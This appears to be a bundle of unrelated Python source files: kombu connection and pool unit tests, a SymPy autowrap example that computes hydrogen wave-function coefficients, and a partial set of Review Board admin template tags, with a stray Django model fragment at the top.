  submission_date = models.DateTimeField(auto_now=True)
  # Id assigned by the execution backend (e.g. the Oozie job id).
  job_id = models.CharField(max_length=128)
  design = models.ForeignKey(OozieDesign)
| |
from __future__ import absolute_import
import pickle
import socket
from copy import copy
from kombu import Connection, Consumer, Producer, parse_url
from kombu.connection import Resource
from kombu.five import items, range
from .case import Case, Mock, SkipTest, patch, skip_if_not_module
from .mocks import Transport
class test_connection_utils(Case):
    """Tests for URL parsing/formatting (`parse_url`, `Connection.as_uri`)."""

    def setup(self):
        # Canonical AMQP URL, its password-masked form (default as_uri()
        # output), and the expected parsed fields.
        self.url = 'amqp://user:pass@localhost:5672/my/vhost'
        self.nopass = 'amqp://user:**@localhost:5672/my/vhost'
        self.expected = {
            'transport': 'amqp',
            'userid': 'user',
            'password': 'pass',
            'hostname': 'localhost',
            'port': 5672,
            'virtual_host': 'my/vhost',
        }

    def test_parse_url(self):
        result = parse_url(self.url)
        self.assertDictEqual(result, self.expected)

    def test_parse_generated_as_uri(self):
        conn = Connection(self.url)
        info = conn.info()
        for k, v in self.expected.items():
            self.assertEqual(info[k], v)
        # by default almost the same- no password
        self.assertEqual(conn.as_uri(), self.nopass)
        self.assertEqual(conn.as_uri(include_password=True), self.url)

    @skip_if_not_module('redis')
    def test_as_uri_when_prefix(self):
        conn = Connection('redis+socket:///var/spool/x/y/z/redis.sock')
        self.assertEqual(
            conn.as_uri(), 'redis+socket:///var/spool/x/y/z/redis.sock',
        )

    @skip_if_not_module('pymongo')
    def test_as_uri_when_mongodb(self):
        x = Connection('mongodb://localhost')
        self.assertTrue(x.as_uri())

    def test_bogus_scheme(self):
        # An unknown transport name raises KeyError on transport lookup.
        with self.assertRaises(KeyError):
            Connection('bogus://localhost:7421').transport

    def assert_info(self, conn, **fields):
        # Helper: assert selected fields of `conn.info()`.
        info = conn.info()
        for field, expected in items(fields):
            self.assertEqual(info[field], expected)

    def test_rabbitmq_example_urls(self):
        # see Appendix A of http://www.rabbitmq.com/uri-spec.html
        self.assert_info(
            Connection('amqp://user:pass@host:10000/vhost'),
            userid='user', password='pass', hostname='host',
            port=10000, virtual_host='vhost',
        )
        # Percent-escapes are decoded in userid/password/host/vhost.
        self.assert_info(
            Connection('amqp://user%61:%61pass@ho%61st:10000/v%2fhost'),
            userid='usera', password='apass', hostname='hoast',
            port=10000, virtual_host='v/host',
        )
        self.assert_info(
            Connection('amqp://'),
            userid='guest', password='guest', hostname='localhost',
            port=5672, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp://:@/'),
            userid='guest', password='guest', hostname='localhost',
            port=5672, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp://user@/'),
            userid='user', password='guest', hostname='localhost',
            port=5672, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp://user:pass@/'),
            userid='user', password='pass', hostname='localhost',
            port=5672, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp://host'),
            userid='guest', password='guest', hostname='host',
            port=5672, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp://:10000'),
            userid='guest', password='guest', hostname='localhost',
            port=10000, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp:///vhost'),
            userid='guest', password='guest', hostname='localhost',
            port=5672, virtual_host='vhost',
        )
        self.assert_info(
            Connection('amqp://host/'),
            userid='guest', password='guest', hostname='host',
            port=5672, virtual_host='/',
        )
        self.assert_info(
            Connection('amqp://host/%2f'),
            userid='guest', password='guest', hostname='host',
            port=5672, virtual_host='/',
        )

    def test_url_IPV6(self):
        # NOTE: the assertions below the skip are intentionally dead code,
        # kept for when urllib gains ipv6 url support.
        raise SkipTest("urllib can't parse ipv6 urls")
        self.assert_info(
            Connection('amqp://[::1]'),
            userid='guest', password='guest', hostname='[::1]',
            port=5672, virtual_host='/',
        )
class test_Connection(Case):
    """Behavioural tests for `kombu.Connection`, driven by the mock Transport."""

    def setup(self):
        self.conn = Connection(port=5672, transport=Transport)

    def test_establish_connection(self):
        conn = self.conn
        conn.connect()
        self.assertTrue(conn.connection.connected)
        self.assertEqual(conn.host, 'localhost:5672')
        channel = conn.channel()
        self.assertTrue(channel.open)
        self.assertEqual(conn.drain_events(), 'event')
        _connection = conn.connection
        conn.close()
        self.assertFalse(_connection.connected)
        self.assertIsInstance(conn.transport, Transport)

    def test_multiple_urls(self):
        # Semicolon-separated string and list forms are equivalent:
        # first host is primary, all hosts become failover alternates.
        conn1 = Connection('amqp://foo;amqp://bar')
        self.assertEqual(conn1.hostname, 'foo')
        self.assertListEqual(conn1.alt, ['amqp://foo', 'amqp://bar'])
        conn2 = Connection(['amqp://foo', 'amqp://bar'])
        self.assertEqual(conn2.hostname, 'foo')
        self.assertListEqual(conn2.alt, ['amqp://foo', 'amqp://bar'])

    def test_collect(self):
        connection = Connection('memory://')
        trans = connection._transport = Mock(name='transport')
        _collect = trans._collect = Mock(name='transport._collect')
        _close = connection._close = Mock(name='connection._close')
        connection.declared_entities = Mock(name='decl_entities')
        uconn = connection._connection = Mock(name='_connection')
        connection.collect()

        # collect() must tear down state without performing a full close.
        self.assertFalse(_close.called)
        _collect.assert_called_with(uconn)
        connection.declared_entities.clear.assert_called_with()
        self.assertIsNone(trans.client)
        self.assertIsNone(connection._transport)
        self.assertIsNone(connection._connection)

    def test_collect_no_transport(self):
        connection = Connection('memory://')
        connection._transport = None
        connection._do_close_self = Mock()
        connection._do_close_transport = Mock()
        connection.collect()
        connection._do_close_self.assert_called_with()
        connection._do_close_transport.assert_called_with()

        # Socket timeouts raised while collecting must be swallowed.
        connection._do_close_self.side_effect = socket.timeout()
        connection.collect()

    def test_collect_transport_gone(self):
        connection = Connection('memory://')
        uconn = connection._connection = Mock(name='conn._conn')
        trans = connection._transport = Mock(name='transport')
        collect = trans._collect = Mock(name='transport._collect')

        # Simulate the transport disappearing mid-collect.
        def se(conn):
            connection._transport = None
        collect.side_effect = se

        connection.collect()
        collect.assert_called_with(uconn)
        self.assertIsNone(connection._transport)

    def test_uri_passthrough(self):
        # Transports with can_parse_url handle the raw URL themselves:
        # kombu must not run parse_url on it.
        transport = Mock(name='transport')
        with patch('kombu.connection.get_transport_cls') as gtc:
            gtc.return_value = transport
            transport.can_parse_url = True
            with patch('kombu.connection.parse_url') as parse_url:
                c = Connection('foo+mysql://some_host')
                self.assertEqual(c.transport_cls, 'foo')
                self.assertFalse(parse_url.called)
                self.assertEqual(c.hostname, 'mysql://some_host')
                self.assertTrue(c.as_uri().startswith('foo+'))
            with patch('kombu.connection.parse_url') as parse_url:
                c = Connection('mysql://some_host', transport='foo')
                self.assertEqual(c.transport_cls, 'foo')
                self.assertFalse(parse_url.called)
                self.assertEqual(c.hostname, 'mysql://some_host')
        c = Connection('pyamqp+sqlite://some_host')
        self.assertTrue(c.as_uri().startswith('pyamqp+'))

    def test_default_ensure_callback(self):
        with patch('kombu.connection.logger') as logger:
            c = Connection(transport=Mock)
            c._default_ensure_callback(KeyError(), 3)
            self.assertTrue(logger.error.called)

    def test_ensure_connection_on_error(self):
        c = Connection('amqp://A;amqp://B')
        with patch('kombu.connection.retry_over_time') as rot:
            c.ensure_connection()
            self.assertTrue(rot.called)

            # The 5th positional argument is the retry interval callback;
            # it alternates 0 (host switch) with the next interval value.
            args = rot.call_args[0]
            cb = args[4]
            intervals = iter([1, 2, 3, 4, 5])
            self.assertEqual(cb(KeyError(), intervals, 0), 0)
            self.assertEqual(cb(KeyError(), intervals, 1), 1)
            self.assertEqual(cb(KeyError(), intervals, 2), 0)
            self.assertEqual(cb(KeyError(), intervals, 3), 2)
            self.assertEqual(cb(KeyError(), intervals, 4), 0)
            self.assertEqual(cb(KeyError(), intervals, 5), 3)
            self.assertEqual(cb(KeyError(), intervals, 6), 0)
            self.assertEqual(cb(KeyError(), intervals, 7), 4)

            errback = Mock()
            c.ensure_connection(errback=errback)
            args = rot.call_args[0]
            cb = args[4]
            self.assertEqual(cb(KeyError(), intervals, 0), 0)
            self.assertTrue(errback.called)

    def test_supports_heartbeats(self):
        c = Connection(transport=Mock)
        c.transport.implements.heartbeats = False
        self.assertFalse(c.supports_heartbeats)

    def test_is_evented(self):
        # NOTE: `async` is the historical attribute name from the
        # Python 2 era of kombu (a keyword in Python >= 3.7).
        c = Connection(transport=Mock)
        c.transport.implements.async = False
        self.assertFalse(c.is_evented)

    def test_register_with_event_loop(self):
        c = Connection(transport=Mock)
        loop = Mock(name='loop')
        c.register_with_event_loop(loop)
        c.transport.register_with_event_loop.assert_called_with(
            c.connection, loop,
        )

    def test_manager(self):
        c = Connection(transport=Mock)
        self.assertIs(c.manager, c.transport.manager)

    def test_copy(self):
        c = Connection('amqp://example.com')
        self.assertEqual(copy(c).info(), c.info())

    def test_copy_multiples(self):
        c = Connection('amqp://A.example.com;amqp://B.example.com')
        self.assertTrue(c.alt)
        d = copy(c)
        self.assertEqual(d.alt, c.alt)

    def test_switch(self):
        # switch() replaces the connection parameters and clears _closed.
        c = Connection('amqp://foo')
        c._closed = True
        c.switch('redis://example.com//3')
        self.assertFalse(c._closed)
        self.assertEqual(c.hostname, 'example.com')
        self.assertEqual(c.transport_cls, 'redis')
        self.assertEqual(c.virtual_host, '/3')

    def test_maybe_switch_next(self):
        c = Connection('amqp://foo;redis://example.com//3')
        c.maybe_switch_next()
        self.assertFalse(c._closed)
        self.assertEqual(c.hostname, 'example.com')
        self.assertEqual(c.transport_cls, 'redis')
        self.assertEqual(c.virtual_host, '/3')

    def test_maybe_switch_next_no_cycle(self):
        # With no alternates the connection parameters stay put.
        c = Connection('amqp://foo')
        c.maybe_switch_next()
        self.assertFalse(c._closed)
        self.assertEqual(c.hostname, 'foo')
        self.assertIn(c.transport_cls, ('librabbitmq', 'pyamqp', 'amqp'))

    def test_heartbeat_check(self):
        c = Connection(transport=Transport)
        c.transport.heartbeat_check = Mock()
        c.heartbeat_check(3)
        c.transport.heartbeat_check.assert_called_with(c.connection, rate=3)

    def test_completes_cycle_no_cycle(self):
        c = Connection('amqp://')
        self.assertTrue(c.completes_cycle(0))
        self.assertTrue(c.completes_cycle(1))

    def test_completes_cycle(self):
        c = Connection('amqp://a;amqp://b;amqp://c')
        self.assertFalse(c.completes_cycle(0))
        self.assertFalse(c.completes_cycle(1))
        self.assertTrue(c.completes_cycle(2))

    def test__enter____exit__(self):
        conn = self.conn
        context = conn.__enter__()
        self.assertIs(context, conn)
        conn.connect()
        self.assertTrue(conn.connection.connected)
        conn.__exit__()
        self.assertIsNone(conn.connection)
        conn.close()  # again

    def test_close_survives_connerror(self):

        class _CustomError(Exception):
            pass

        class MyTransport(Transport):
            connection_errors = (_CustomError,)

            def close_connection(self, connection):
                raise _CustomError('foo')

        # Errors listed in connection_errors must not escape close().
        conn = Connection(transport=MyTransport)
        conn.connect()
        conn.close()
        self.assertTrue(conn._closed)

    def test_close_when_default_channel(self):
        conn = self.conn
        conn._default_channel = Mock()
        conn._close()
        conn._default_channel.close.assert_called_with()

    def test_close_when_default_channel_close_raises(self):

        class Conn(Connection):

            @property
            def connection_errors(self):
                return (KeyError,)

        conn = Conn('memory://')
        conn._default_channel = Mock()
        conn._default_channel.close.side_effect = KeyError()

        conn._close()
        conn._default_channel.close.assert_called_with()

    def test_revive_when_default_channel(self):
        conn = self.conn
        defchan = conn._default_channel = Mock()
        conn.revive(Mock())

        # Reviving must close and drop the stale default channel.
        defchan.close.assert_called_with()
        self.assertIsNone(conn._default_channel)

    def test_ensure_connection(self):
        self.assertTrue(self.conn.ensure_connection())

    def test_ensure_success(self):
        def publish():
            return 'foobar'

        ensured = self.conn.ensure(None, publish)
        self.assertEqual(ensured(), 'foobar')

    def test_ensure_failure(self):
        class _CustomError(Exception):
            pass

        def publish():
            raise _CustomError('bar')

        # Errors not in connection_errors propagate unchanged.
        ensured = self.conn.ensure(None, publish)
        with self.assertRaises(_CustomError):
            ensured()

    def test_ensure_connection_failure(self):
        class _ConnectionError(Exception):
            pass

        def publish():
            raise _ConnectionError('failed connection')

        self.conn.transport.connection_errors = (_ConnectionError,)
        ensured = self.conn.ensure(self.conn, publish)
        with self.assertRaises(_ConnectionError):
            ensured()

    def test_autoretry(self):
        myfun = Mock()
        self.conn.transport.connection_errors = (KeyError,)

        # Fail on the first call only; autoretry should hide the failure.
        def on_call(*args, **kwargs):
            myfun.side_effect = None
            raise KeyError('foo')
        myfun.side_effect = on_call

        insured = self.conn.autoretry(myfun)
        insured()

        self.assertTrue(myfun.called)

    def test_SimpleQueue(self):
        conn = self.conn
        q = conn.SimpleQueue('foo')
        self.assertIs(q.channel, conn.default_channel)
        chan = conn.channel()
        q2 = conn.SimpleQueue('foo', channel=chan)
        self.assertIs(q2.channel, chan)

    def test_SimpleBuffer(self):
        conn = self.conn
        q = conn.SimpleBuffer('foo')
        self.assertIs(q.channel, conn.default_channel)
        chan = conn.channel()
        q2 = conn.SimpleBuffer('foo', channel=chan)
        self.assertIs(q2.channel, chan)

    def test_Producer(self):
        conn = self.conn
        self.assertIsInstance(conn.Producer(), Producer)
        self.assertIsInstance(conn.Producer(conn.default_channel), Producer)

    def test_Consumer(self):
        conn = self.conn
        self.assertIsInstance(conn.Consumer(queues=[]), Consumer)
        self.assertIsInstance(conn.Consumer(queues=[],
                              channel=conn.default_channel), Consumer)

    def test__repr__(self):
        self.assertTrue(repr(self.conn))

    def test__reduce__(self):
        # Connections must survive a pickle round-trip with equal info().
        x = pickle.loads(pickle.dumps(self.conn))
        self.assertDictEqual(x.info(), self.conn.info())

    def test_channel_errors(self):

        class MyTransport(Transport):
            channel_errors = (KeyError, ValueError)

        conn = Connection(transport=MyTransport)
        self.assertTupleEqual(conn.channel_errors, (KeyError, ValueError))

    def test_connection_errors(self):

        class MyTransport(Transport):
            connection_errors = (KeyError, ValueError)

        conn = Connection(transport=MyTransport)
        self.assertTupleEqual(conn.connection_errors, (KeyError, ValueError))
class test_Connection_with_transport_options(Case):
    """Transport options passed to Connection must be stored verbatim."""

    transport_options = {'pool_recycler': 3600, 'echo': True}

    def setup(self):
        self.conn = Connection(port=5672, transport=Transport,
                               transport_options=self.transport_options)

    def test_establish_connection(self):
        conn = self.conn
        self.assertEqual(conn.transport_options, self.transport_options)
class xResource(Resource):
    """Minimal concrete Resource used to exercise the base-class interface."""

    def setup(self):
        # No-op override so the class can be instantiated in tests.
        pass
class ResourceCase(Case):
    """
    Shared test suite for `Resource` implementations (connection and
    channel pools). Set `abstract = False` in a subclass and implement
    `create_resource` to run the concrete tests.
    """
    abstract = True

    def create_resource(self, limit):
        raise NotImplementedError('subclass responsibility')

    def assertState(self, P, avail, dirty):
        # Assert the number of available vs. checked-out resources.
        self.assertEqual(P._resource.qsize(), avail)
        self.assertEqual(len(P._dirty), dirty)

    def test_setup(self):
        if self.abstract:
            with self.assertRaises(NotImplementedError):
                Resource()

    def test_acquire__release(self):
        if self.abstract:
            return
        P = self.create_resource(10)
        self.assertState(P, 10, 0)
        chans = [P.acquire() for _ in range(10)]
        self.assertState(P, 0, 10)
        # Pool exhausted: further acquires must fail.
        with self.assertRaises(P.LimitExceeded):
            P.acquire()
        chans.pop().release()
        self.assertState(P, 1, 9)
        [chan.release() for chan in chans]
        self.assertState(P, 10, 0)

    def test_acquire_prepare_raises(self):
        if self.abstract:
            return
        P = self.create_resource(10)
        self.assertEqual(len(P._resource.queue), 10)
        P.prepare = Mock()
        P.prepare.side_effect = IOError()
        with self.assertRaises(IOError):
            P.acquire(block=True)
        # A failed prepare must return the resource to the pool.
        self.assertEqual(len(P._resource.queue), 10)

    def test_acquire_no_limit(self):
        if self.abstract:
            return
        P = self.create_resource(None)
        P.acquire().release()

    def test_replace_when_limit(self):
        if self.abstract:
            return
        P = self.create_resource(10)
        r = P.acquire()
        P._dirty = Mock()
        P.close_resource = Mock()

        # With a limit, replace() discards from _dirty and closes.
        P.replace(r)
        P._dirty.discard.assert_called_with(r)
        P.close_resource.assert_called_with(r)

    def test_replace_no_limit(self):
        if self.abstract:
            return
        P = self.create_resource(None)
        r = P.acquire()
        P._dirty = Mock()
        P.close_resource = Mock()

        # Without a limit there is no dirty-tracking: close only.
        P.replace(r)
        self.assertFalse(P._dirty.discard.called)
        P.close_resource.assert_called_with(r)

    def test_interface_prepare(self):
        if not self.abstract:
            return
        x = xResource()
        self.assertEqual(x.prepare(10), 10)

    def test_force_close_all_handles_AttributeError(self):
        if self.abstract:
            return
        P = self.create_resource(10)
        cr = P.collect_resource = Mock()
        cr.side_effect = AttributeError('x')

        P.acquire()
        self.assertTrue(P._dirty)

        P.force_close_all()

    def test_force_close_all_no_mutex(self):
        if self.abstract:
            return
        P = self.create_resource(10)
        P.close_resource = Mock()

        m = P._resource = Mock()
        m.mutex = None
        m.queue.pop.side_effect = IndexError

        P.force_close_all()

    def test_add_when_empty(self):
        if self.abstract:
            return
        P = self.create_resource(None)
        P._resource.queue.clear()
        self.assertFalse(P._resource.queue)
        P._add_when_empty()
        self.assertTrue(P._resource.queue)
class test_ConnectionPool(ResourceCase):
    """ResourceCase run against `Connection.Pool`."""
    abstract = False

    def create_resource(self, limit):
        return Connection(port=5672, transport=Transport).Pool(limit)

    def test_setup(self):
        P = self.create_resource(10)
        q = P._resource.queue
        # Queue entries are callables; calling one yields a Connection
        # that has not been evaluated yet (no underlying _connection).
        self.assertIsNone(q[0]()._connection)
        self.assertIsNone(q[1]()._connection)
        self.assertIsNone(q[2]()._connection)

    def test_acquire_raises_evaluated(self):
        P = self.create_resource(1)
        # evaluate the connection first
        r = P.acquire()
        r.release()
        P.prepare = Mock()
        P.prepare.side_effect = MemoryError()
        P.release = Mock()
        # A failing prepare on an evaluated resource must release it.
        with self.assertRaises(MemoryError):
            with P.acquire():
                assert False
        P.release.assert_called_with(r)

    def test_release_no__debug(self):
        P = self.create_resource(10)
        R = Mock()
        R._debug.side_effect = AttributeError()
        P.release_resource(R)

    def test_setup_no_limit(self):
        P = self.create_resource(None)
        self.assertFalse(P._resource.queue)
        self.assertIsNone(P.limit)

    def test_prepare_not_callable(self):
        # Already-evaluated connections pass through prepare() unchanged.
        P = self.create_resource(None)
        conn = Connection('memory://')
        self.assertIs(P.prepare(conn), conn)

    def test_acquire_channel(self):
        P = self.create_resource(10)
        with P.acquire_channel() as (conn, channel):
            self.assertIs(channel, conn.default_channel)
class test_ChannelPool(ResourceCase):
    """ResourceCase run against `Connection.ChannelPool`."""
    abstract = False

    def create_resource(self, limit):
        return Connection(port=5672, transport=Transport).ChannelPool(limit)

    def test_setup(self):
        P = self.create_resource(10)
        q = P._resource.queue
        # Pooled entries are lazy: channel attributes don't exist until
        # the channel is actually created.
        with self.assertRaises(AttributeError):
            q[0].basic_consume

    def test_setup_no_limit(self):
        P = self.create_resource(None)
        self.assertFalse(P._resource.queue)
        self.assertIsNone(P.limit)

    def test_prepare_not_callable(self):
        # A real channel passes through prepare() unchanged.
        P = self.create_resource(10)
        conn = Connection('memory://')
        chan = conn.default_channel
        self.assertIs(P.prepare(chan), chan)
| |
#!/usr/bin/env python
"""
Numerical integration with autowrap
-----------------------------------
This example demonstrates how you can use the autowrap module in SymPy
to create fast, numerical integration routines callable from python. See
in the code for detailed explanations of the various steps. An
autowrapped sympy expression can be significantly faster than what you
would get by applying a sequence of the ufuncs shipped with numpy. [0]
We will find the coefficients needed to approximate a quantum mechanical
Hydrogen wave function in terms of harmonic oscillator solutions. For
the sake of demonstration, this will be done by setting up a simple
numerical integration scheme as a SymPy expression, and obtain a binary
implementation with autowrap.
You need to have numpy installed to run this example, as well as a
working fortran compiler. If you have pylab installed, you will be
rewarded with a nice plot in the end.
[0]:
http://ojensen.wordpress.com/2010/08/10/fast-ufunc-ish-hydrogen-solutions/
----
"""
import sys
from sympy.external import import_module
np = import_module('numpy')
if not np:
sys.exit("Cannot import numpy. Exiting.")
pylab = import_module('pylab', warn_not_installed=True)
from sympy.utilities.lambdify import implemented_function
from sympy.utilities.autowrap import autowrap, ufuncify
from sympy import Idx, IndexedBase, Lambda, pprint, Symbol, oo, Integral,\
Function
from sympy.physics.sho import R_nl
from sympy.physics.hydrogen import R_nl as hydro_nl
# ***************************************************************************
# calculation parameters to play with
# ***************************************************************************
# Module-level knobs read by main() below.
basis_dimension = 5  # Size of h.o. basis (n < basis_dimension)
omega2 = 0.1  # in atomic units: twice the oscillator frequency
orbital_momentum_l = 1  # the quantum number `l` for angular momentum
hydrogen_n = 2  # the nodal quantum number for the Hydrogen wave
rmax = 20  # cut off in the radial direction
gridsize = 200  # number of points in the grid
# ***************************************************************************
def main():
    """Run the demonstration.

    Builds ufuncs for the radial harmonic-oscillator basis, sets up one
    autowrapped binary integrator per basis state, computes the expansion
    coefficients of a hydrogen radial wave function in that basis, and
    reports (and optionally plots) the quality of the approximation.

    Note: this example uses Python 2 print statements throughout.
    """
    print __doc__

    # arrays are represented with IndexedBase, indices with Idx
    m = Symbol('m', integer=True)  # symbolic length of the grid arrays
    i = Idx('i', m)  # index ranging over the grid
    A = IndexedBase('A')  # the grid array
    B = IndexedBase('B')  # NOTE(review): B appears unused below
    x = Symbol('x')  # radial coordinate

    print "Compiling ufuncs for radial harmonic oscillator solutions"

    # setup a basis of ho-solutions (for l=0)
    basis_ho = {}
    for n in range(basis_dimension):

        # Setup the radial ho solution for this n
        expr = R_nl(n, orbital_momentum_l, omega2, x)

        # Reduce the number of operations in the expression by eval to float
        expr = expr.evalf(15)

        print "The h.o. wave function with l = %i and n = %i is" % (
            orbital_momentum_l, n)
        pprint(expr)

        # implement, compile and wrap it as a ufunc
        basis_ho[n] = ufuncify(x, expr)

    # now let's see if we can express a hydrogen radial wave in terms of
    # the ho basis. Here's the solution we will approximate:
    H_ufunc = ufuncify(x, hydro_nl(hydrogen_n, orbital_momentum_l, 1, x))

    # The transformation to a different basis can be written like this,
    #
    #   psi(r) = sum_i c(i) phi_i(r)
    #
    # where psi(r) is the hydrogen solution, phi_i(r) are the H.O. solutions
    # and c(i) are scalar coefficients.
    #
    # So in order to express a hydrogen solution in terms of the H.O. basis, we
    # need to determine the coefficients c(i). In position space, it means
    # that we need to evaluate an integral:
    #
    #   psi(r) = sum_i Integral(R**2*conj(phi(R))*psi(R), (R, 0, oo)) phi_i(r)
    #
    # To calculate the integral with autowrap, we notice that it contains an
    # element-wise sum over all vectors. Using the Indexed class, it is
    # possible to generate autowrapped functions that perform summations in
    # the low-level code. (In fact, summations are very easy to create, and as
    # we will see it is often necessary to take extra steps in order to avoid
    # them.)

    # we need one integration ufunc for each wave function in the h.o. basis
    binary_integrator = {}
    for n in range(basis_dimension):

        #
        # setup basis wave functions
        #
        # To get inline expressions in the low level code, we attach the
        # wave function expressions to a regular SymPy function using the
        # implemented_function utility. This is an extra step needed to avoid
        # erroneous summations in the wave function expressions.
        #
        # Such function objects carry around the expression they represent,
        # but the expression is not exposed unless explicit measures are taken.
        # The benefit is that the routines that searches for repeated indices
        # in order to make contractions will not search through the wave
        # function expression.
        psi_ho = implemented_function('psi_ho',
            Lambda(x, R_nl(n, orbital_momentum_l, omega2, x)))

        # We represent the hydrogen function by an array which will be an input
        # argument to the binary routine. This will let the integrators find
        # h.o. basis coefficients for any wave function we throw at them.
        psi = IndexedBase('psi')

        #
        # setup expression for the integration
        #

        step = Symbol('step')  # use symbolic stepsize for flexibility

        # let i represent an index of the grid array, and let A represent the
        # grid array. Then we can approximate the integral by a sum over the
        # following expression (simplified rectangular rule, ignoring end point
        # corrections):
        expr = A[i]**2*psi_ho(A[i])*psi[i]*step

        if n == 0:
            print "Setting up binary integrators for the integral:"
            pprint(Integral(x**2*psi_ho(x)*Function('psi')(x), (x, 0, oo)))

        # But it needs to be an operation on indexed objects, so that the code
        # generators will recognize it correctly as an array.
        # expr = expr.subs(x, A[i])

        # Autowrap it. For functions that take more than one argument, it is
        # a good idea to use the 'args' keyword so that you know the signature
        # of the wrapped function. (The dimension m will be an optional
        # argument, but it must be present in the args list.)
        binary_integrator[n] = autowrap(expr, args=[A.label, psi.label, step, m])

        # Lets see how it converges with the grid dimension
        print "Checking convergence of integrator for n = %i" % n
        for g in range(3, 8):
            grid, step = np.linspace(0, rmax, 2**g, retstep=True)
            print "grid dimension %5i, integral = %e" % (2**g,
                binary_integrator[n](grid, H_ufunc(grid), step))

    print "A binary integrator has been set up for each basis state"
    print "We will now use them to reconstruct a hydrogen solution."

    # Note: We didn't need to specify grid or use gridsize before now
    grid, stepsize = np.linspace(0, rmax, gridsize, retstep=True)

    print "Calculating coefficients with gridsize = %i and stepsize %f" % (
        len(grid), stepsize)

    coeffs = {}
    for n in range(basis_dimension):
        coeffs[n] = binary_integrator[n](grid, H_ufunc(grid), stepsize)
        print "c(%i) = %e" % (n, coeffs[n])

    print "Constructing the approximate hydrogen wave"
    hydro_approx = 0
    all_steps = {}
    for n in range(basis_dimension):
        # accumulate the contribution of basis state n and remember each
        # partial sum so it can be plotted separately below
        hydro_approx += basis_ho[n](grid)*coeffs[n]
        all_steps[n] = hydro_approx.copy()
        if pylab:
            line = pylab.plot(grid, all_steps[n], ':', label='max n = %i' % n)

    # check error numerically
    diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
    print "Error estimate: the element with largest deviation misses by %f" % diff
    if diff > 0.01:
        print "This is much, try to increase the basis size or adjust omega"
    else:
        print "Ah, that's a pretty good approximation!"

    # Check visually
    if pylab:
        print "Here's a plot showing the contribution for each n"
        # 'line' refers to the last (most complete) partial sum plotted above
        line[0].set_linestyle('-')
        pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
        pylab.legend()
        pylab.show()

    print """Note:
    These binary integrators were specialized to find coefficients for a
    harmonic oscillator basis, but they can process any wave function as long
    as it is available as a vector and defined on a grid with equidistant
    points. That is, on any grid you get from numpy.linspace.
    To make the integrators even more flexible, you can setup the harmonic
    oscillator solutions with symbolic parameters omega and l. Then the
    autowrapped binary routine will take these scalar variables as arguments,
    so that the integrators can find coefficients for *any* isotropic harmonic
    oscillator basis.
    """
# Run the demonstration when executed as a script.
if __name__ == '__main__':
    main()
| |
from __future__ import unicode_literals
import re
from django import template
from django.contrib import messages
from django.contrib.admin.templatetags.admin_urls import (
add_preserved_filters,
admin_urlname,
admin_urlquote)
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.template.context import RequestContext
from django.utils import six
from django.utils.safestring import mark_safe
from djblets.util.templatetags.djblets_js import json_dumps_items
from reviewboard import get_version_string
from reviewboard.admin.forms.change_form import ChangeFormFieldset
from reviewboard.hostingsvcs.models import HostingServiceAccount
from reviewboard.notifications.models import WebHookTarget
from reviewboard.oauth.models import Application
from reviewboard.reviews.models import DefaultReviewer, Group
from reviewboard.scmtools.models import Repository
from reviewboard.site.urlresolvers import local_site_reverse
register = template.Library()
@register.inclusion_tag('admin/subnav_item.html', takes_context=True)
def admin_subnav(context, url_name, name, icon=""):
    """Render an ``<li>`` entry linking to an admin settings tab.

    Args:
        context (django.template.Context):
            The template context, used to look up the current request.

        url_name (unicode):
            The name of the URL to link to.

        name (unicode):
            The label to display for the entry.

        icon (unicode, optional):
            The name of an icon to show beside the label, if any.

    Returns:
        django.template.context.RequestContext:
        Context for rendering the subnav item template.
    """
    request = context.get('request')
    tab_url = local_site_reverse(url_name, request=request)

    # Mark the entry as current when it points at the page being viewed.
    is_current = request is not None and tab_url == request.path

    return RequestContext(request, {
        'url': tab_url,
        'name': name,
        'current': is_current,
        'icon': icon,
    })
@register.inclusion_tag('admin/sidebar.html', takes_context=True)
def admin_sidebar(context):
    """Render the admin sidebar.

    This includes the configuration links and setting indicators (object
    counts for users, groups, repositories, and other administered models).

    Args:
        context (django.template.Context):
            The context for the page.

    Returns:
        django.template.context.RequestContext:
        Context for rendering the sidebar template.
    """
    request = context.get('request')

    sidebar_context = {
        'count_users': User.objects.count(),
        'count_review_groups': Group.objects.count(),
        'count_default_reviewers': DefaultReviewer.objects.count(),
        'count_oauth_applications': Application.objects.count(),
        'count_repository': Repository.objects.accessible(
            request.user, visible_only=False).count(),
        'count_webhooks': WebHookTarget.objects.count(),
        'count_hosting_accounts': HostingServiceAccount.objects.count(),
        'version': get_version_string(),
    }

    # We're precomputing URLs in here, rather than computing them in the
    # template, because we need to always ensure that reverse() will be
    # searching all available URL patterns and not just the ones bound to
    # request.current_app.
    #
    # current_app gets set by AdminSite views, and if we're in an extension's
    # AdminSite view, we'll fail to resolve these URLs from within the
    # template. We don't have that problem if calling reverse() ourselves.
    admin_url_names = (
        'auth_user_add',
        'auth_user_changelist',
        'hostingsvcs_hostingserviceaccount_add',
        'hostingsvcs_hostingserviceaccount_changelist',
        'notifications_webhooktarget_add',
        'notifications_webhooktarget_changelist',
        'oauth_application_add',
        'oauth_application_changelist',
        'reviews_defaultreviewer_add',
        'reviews_defaultreviewer_changelist',
        'reviews_group_add',
        'reviews_group_changelist',
        'scmtools_repository_add',
        'scmtools_repository_changelist',
    )

    for url_name in admin_url_names:
        sidebar_context['url_%s' % url_name] = reverse('admin:%s' % url_name)

    return RequestContext(request, sidebar_context)
@register.simple_tag
def alert_css_classes_for_message(message):
    """Render the CSS classes for a rb-c-alert from a Django Message.

    This helps to craft an alert that reflects the status of a
    :py:class:`~django.contrib.messages.storage.base.Message`.

    The result contains a CSS modifier class matching the message's level,
    followed by any extra tags defined on the message.

    Args:
        message (django.contrib.messages.storage.base.Message):
            The message to render classes for.

    Returns:
        unicode:
        A space-separated list of classes.
    """
    level_to_class = {
        messages.DEBUG: '-is-info',
        messages.INFO: '-is-info',
        messages.SUCCESS: '-is-success',
        messages.WARNING: '-is-warning',
        messages.ERROR: '-is-error',
    }

    classes = level_to_class[message.level]
    extra_tags = message.extra_tags

    if extra_tags:
        classes = '%s %s' % (classes, extra_tags)

    return classes
@register.filter
def split_error_title_text(error):
    """Split an exception's text into a title and body text.

    Args:
